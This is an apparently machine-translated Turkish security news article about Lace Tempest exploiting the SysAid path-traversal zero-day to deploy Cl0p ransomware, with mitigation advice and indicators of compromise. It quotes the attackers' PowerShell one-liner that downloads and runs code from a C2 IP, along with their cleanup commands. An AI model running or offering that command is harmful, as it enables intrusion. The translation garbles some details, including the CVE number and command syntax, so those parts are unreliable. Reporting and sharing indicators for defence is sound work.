MOVEit Hackerları SysAid Sıfır Gün Kusuruna Dönüyor


SysAid Sunucusu Sıfır Gün

Daha önce bildirildiği gibi SysAid, şirket içi SysAid sunucularını etkileyen sıfır gün sorununu açıkladı. Güvenlik açığının bir yol geçiş güvenlik açığı olduğu tespit edildi ve CVE-2023-47426 verildi.

Ek olarak SysAid, Lace Tempest’in bu güvenlik açığından yararlandığına dair raporların bulunduğunu belirtti.

DÖRT

Ayrıca Microsoft Tehdit İstihbarat Ekibi analizi, Lace Tempest tehdit aktörünün etkilenen sistemlere Cl0p fidye yazılımını dağıtmak için bu güvenlik açığından yararlandığını belirtti.

Bu tehdit aktörü, MOVEit Transfer uygulamalarını ve GoAnywhere MFT gasp saldırılarını istismar edenle aynı kişidir.

Rapid7 Analizi

Cyber ​​Security News ile paylaşılan raporlara göre Rapid7, SysAid sunucularındaki bu güvenlik açığını analiz ediyor. SysAid’in güvenlik uyarısında, tehdit aktörünün bu güvenlik açığını WebShell ve diğer yüklerden oluşan bir WAR arşivi yüklemek için kullandığı belirtildi.

Bunlar, istismarın bir parçası olarak SysAid’in Tomcat web hizmetinin köküne yüklendi. Ayrıca tehdit aktörlerinin istismar amacıyla spoolsv.exe, msiexec.exe ve svchost.exe olmak üzere üç işlemi kullandığı da bildirildi.

Ancak, yararlanma sonrası, MeshAgent uzaktan yönetim aracı ve GraceWire kötü amaçlı yazılımının etkilenen cihazlara dağıtılmasıyla gerçekleştirildi.

SysAid, 5000 müşteriye sahip olduğunu iddia ediyor ve risk azaltma adımları için onlarla proaktif olarak iletişim kuruyor. SysAid ayrıca bu güvenlik açıklarını gidermek için yamalar yayınladı.

Belge

Depolamanızı SafeGuard ile Koruyun

StorageGuard yüzlerce depolama ve yedekleme cihazındaki yanlış güvenlik yapılandırmalarını ve güvenlik açıklarını tarar, tespit eder ve düzeltir.


Azaltma

SysAid Şirket içi sunucularda bulunan CVE-2023-47246, 23.3.36 sürümünde düzeltilebilmektedir. Tehdit aktörlerinin sunuculardaki zayıf noktalardan yararlanmasını engellemek için SysAid sunucu müşterilerinin öncelikli olarak gerekli yamaları uygulamaları önerilir.

Uzlaşma Göstergeleri

Hash’ler

Dosya adıSha256Yorum
kullanıcı.exeb5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4dKötü amaçlı yükleyici
Meshagent.exe2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4ccaMeshagent.exe uzaktan yönetici aracı

IP Adresleri

IPYorum
81.19.138[.]52GraceWire Yükleyici C2
45.182.189[.]100GraceWire Yükleyici C2
179.60.150[.]34Kobalt Saldırısı C2
45.155.37[.]105Meshagent uzaktan yönetici aracı (C2)

Dosya Yolları

YolYorum
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exeGraceWire
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.warSaldırganın kullandığı WebShell’lerin ve araçların arşivi
C:\Program Files\SysAidServer\tomcat\webapps\leaveYürütme sırasında saldırgan komut dosyaları için bayrak olarak kullanılır

Komutlar

Kobalt Saldırısı

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w gizli -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)

Uzlaşma Sonrası Temizleme

Öğeyi Kaldır -Yol “$tomcat_dir\webapps\usersfiles\leave”.

Remove-Item -“$wapps\usersfiles.war”ı zorla.

Remove-Item -“$wapps\usersfiles\user.*” komutunu zorlayın.

& “$wapps\usersfiles\user.exe”.

Antivirüs Algılamaları

Truva Atı:Win32/TurtleLoader

Arka kapı: Win32/Clop

Fidye: Win32/Clop

Patch Manager Plus, 850’den fazla üçüncü taraf uygulamanın otomatik güncellemesi için tek noktadan çözüm: Ücretsiz Denemeyi Deneyin.



Source link